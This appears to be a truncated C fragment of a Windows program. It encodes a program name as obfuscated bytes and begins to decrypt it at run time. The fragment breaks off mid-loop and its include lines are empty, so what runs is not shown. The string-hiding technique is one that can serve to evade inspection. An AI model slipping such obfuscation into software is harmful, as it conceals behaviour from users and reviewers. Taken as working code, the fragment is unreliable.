#include #include int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MSG msg; /* crippled program name */ char prog[50] = {0x78,0x7b,0x6f,0x7e,0x20,0x6a,0x68,0x74,0}; int i,len; /* decrypt */ len = strlen(prog); for(i=0;i